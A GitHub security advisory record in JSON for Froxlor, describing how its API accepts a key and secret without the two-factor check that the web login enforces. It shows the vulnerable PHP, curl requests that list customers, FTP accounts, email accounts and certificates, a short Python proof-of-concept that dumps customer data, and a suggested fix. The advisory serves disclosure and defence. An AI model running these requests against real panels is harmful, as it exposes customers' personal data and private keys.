{"id":"GHSA-f9rx-7wf7-jr36","summary":"Froxlor's API Authentication bypasses 2FA Authentication","details":"## Summary\n\nFroxlor's API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.\n\nAn attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.\n\n## Affected Code\n\n**Web UI — 2FA enforced** (`index.php:82-149`):\n\n```php\nif ($result['type_2fa'] != 0) {\n    // Redirects to 2FA input page\n    // Calls FroxlorTwoFactorAuth::verifyCode()\n    // Login is NOT completed without valid TOTP code\n}\n```\n\n**API — 2FA absent** (`lib/Froxlor/Api/FroxlorRPC.php:75-105`):\n\n```php\nprivate static function validateAuth(string $key, string $secret): bool\n{\n    $sel_stmt = Database::prepare(\"\n        SELECT ak.*, a.api_allowed as admin_api_allowed,\n               c.api_allowed as cust_api_allowed, c.deactivated\n        FROM `api_keys` ak\n        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid\n        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid\n        WHERE `apikey` = :ak AND `secret` = :as\n    \");\n    $result = Database::pexecute_first($sel_stmt, ['ak' =\u003e $key, 'as' =\u003e $secret]);\n    if ($result) {\n        if ($result['apikey'] == $key && $result['secret'] == $secret\n            && ($result['valid_until'] == -1 || $result['valid_until'] \u003e= time())\n            && (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)\n                || ($result['customerid'] \u003e 0 && $result['cust_api_allowed'] == 1\n                    && $result['deactivated'] == 0))) {\n            // Checks: key match, secret match, not expired, API allowed, not deactivated\n            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status\n            return true;\n        }\n    }\n    throw new Exception('Invalid authorization credentials', 403);\n}\n```\n\nThere are zero references to 2FA, TOTP, `type_2fa`, or `FroxlorTwoFactorAuth` in the entire `lib/Froxlor/Api/` directory:\n\n```bash\n$ grep -rn '2fa\\|totp\\|two.factor\\|FroxlorTwoFactor' lib/Froxlor/Api/\n# (no output)\n```\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- API enabled (`api.enabled=1`)\n- Admin account has 2FA enabled (`type_2fa=1`, TOTP configured)\n- Admin has an API key\n\n### Step 1: Confirm 2FA blocks web UI login\n\n```\nPOST /index.php HTTP/1.1\nHost: panel.example.com\nContent-Type: application/x-www-form-urlencoded\n\nloginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send\n```\n\n**Result:** Redirect to `index.php?showmessage=4` — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.\n\n### Step 2: Authenticate via API — no TOTP required\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"command\":\"Customers.listing\",\"params\":{}}' \\\n  https://panel.example.com/api.php\n```\n\n**Result:** HTTP 200 with full customer listing:\n\n```json\n{\n  \"data\": {\n    \"list\": [\n      {\n        \"loginname\": \"testcust\",\n        \"email\": \"test@froxlor.lab\",\n        \"name\": \"Test\",\n        \"firstname\": \"Customer\"\n      }\n    ]\n  }\n}\n```\n\nNo TOTP code was provided. No 2FA prompt was returned. Full access granted.\n\n### Step 3: Access additional sensitive resources\n\nAll of these succeed without any 2FA challenge:\n\n```bash\n# Domains\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Domains.listing\"}' .../api.php\n# FTP accounts (home directories, credentials)\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Ftps.listing\"}' .../api.php\n# Email accounts\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Emails.listing\"}' .../api.php\n# MySQL databases\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Mysqls.listing\"}' .../api.php\n# SSL certificates (private keys)\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Certificates.listing\"}' .../api.php\n# DNS records\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"DomainZones.listing\",\"params\":{\"domainname\":\"example.com\"}}' .../api.php\n```\n\n165 API functions are accessible, including write operations (`Customers.update`, `Domains.add`, `Ftps.add`, etc.).\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor \u003c= 2.3.x — 2FA Bypass via API (CWE-287)\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ntarget, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]\n\nr = requests.post(f\"{target}/api.php\", auth=(key, secret),\n    json={\"command\": \"Customers.listing\", \"params\": {}}, verify=False)\ndata = r.json()\n\nprint(f\"HTTP {r.status_code}\")\nif \"data\" in data:\n    for c in data[\"data\"].get(\"list\", []):\n        print(f\"  {c['loginname']} | {c['email']}\")\n    print(f\"\\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET`\n\n## Impact\n\nWhen a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:\n\n- **Customer data**: PII (name, email, address) readable and modifiable\n- **Domains**: Full control over domains, subdomains, DNS records\n- **Email accounts**: Create, read, delete email accounts and forwarders\n- **FTP accounts**: Access home directory paths and credentials\n- **MySQL databases**: Full database management\n- **SSL certificates**: Read private keys, modify certificate bindings\n- **165 API functions**: Including all write operations\n\nAPI keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.\n\n### Comparison with CVE-2023-3173\n\nCVE-2023-3173 (\"2FA Bypass by Brute Force\") was accepted as **Critical ($60 bounty)** and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.\n\n## Suggested Fix\n\nAdd 2FA verification to `FroxlorRPC::validateAuth()`. When the authenticated user has `type_2fa != 0`, require a TOTP code as an additional API parameter:\n\n```php\n// lib/Froxlor/Api/FroxlorRPC.php, after line 100:\n// Check 2FA if enabled for this user\nif (!empty($result['adminid'])) {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id\"),\n        ['id' =\u003e $result['adminid']]\n    );\n} else {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id\"),\n        ['id' =\u003e $result['customerid']]\n    );\n}\nif ($user && $user['type_2fa'] != 0) {\n    // Require X-2FA-Code header or 'totp_code' in request body\n    $totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;\n    if (empty($totp_code)) {\n        throw new Exception('2FA code required', 401);\n    }\n    $tfa = new FroxlorTwoFactorAuth($user['data_2fa']);\n    if (!$tfa-\u003everifyCode($totp_code)) {\n        throw new Exception('Invalid 2FA code', 403);\n    }\n}\n```\n\nAlternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.","aliases":["CVE-2026-52793"],"modified":"2026-06-09T13:15:15.848502522Z","published":"2026-06-03T21:41:12Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-06-03T21:41:12Z","nvd_published_at":null,"cwe_ids":["CWE-287"]},"references":[{"type":"WEB","url":"https://github.com/froxlor/froxlor/security/advisories/GHSA-f9rx-7wf7-jr36"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-34qg-65m4-f23m"},{"type":"PACKAGE","url":"https://github.com/froxlor/froxlor"},{"type":"WEB","url":"https://github.com/froxlor/froxlor/releases/tag/2.3.7"}],"affected":[{"package":{"name":"froxlor/froxlor","ecosystem":"Packagist","purl":"pkg:composer/froxlor%2Ffroxlor"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.3.7"}]}],"versions":["0.10.0","0.10.0-rc1","0.10.0-rc2","0.10.1","0.10.10","0.10.11","0.10.12","0.10.13","0.10.14","0.10.15","0.10.16","0.10.17","0.10.18","0.10.19","0.10.2","0.10.20","0.10.21","0.10.22","0.10.23","0.10.23.1","0.10.24","0.10.25","0.10.26","0.10.27","0.10.28","0.10.29","0.10.29.1","0.10.3","0.10.30","0.10.31","0.10.32","0.10.33","0.10.34","0.10.34.1","0.10.35","0.10.35.1","0.10.36","0.10.37","0.10.38","0.10.38.1","0.10.38.2","0.10.38.3","0.10.4","0.10.5","0.10.6","0.10.7","0.10.8","0.10.9","2.0.0","2.0.1","2.0.10","2.0.11","2.0.12","2.0.13","2.0.14","2.0.15","2.0.16","2.0.17","2.0.18","2.0.19","2.0.2","2.0.20","2.0.21","2.0.22","2.0.23","2.0.24","2.0.3","2.0.4","2.0.5","2.0.6","2.0.7","2.0.8","2.0.9","2.1.0","2.1.0-beta1","2.1.0-beta2","2.1.0-rc1","2.1.0-rc2","2.1.0-rc3","2.1.1","2.1.2","2.1.3","2.1.4","2.1.5","2.1.6","2.1.7","2.1.8","2.1.9","2.2.0","2.2.0-rc1","2.2.0-rc2","2.2.0-rc3","2.2.1","2.2.2","2.2.3","2.2.4","2.2.5","2.2.6","2.2.7","2.2.8","2.3.0","2.3.0-rc1","2.3.1","2.3.2","2.3.3","2.3.4","2.3.5","2.3.6"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-f9rx-7wf7-jr36/GHSA-f9rx-7wf7-jr36.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}]}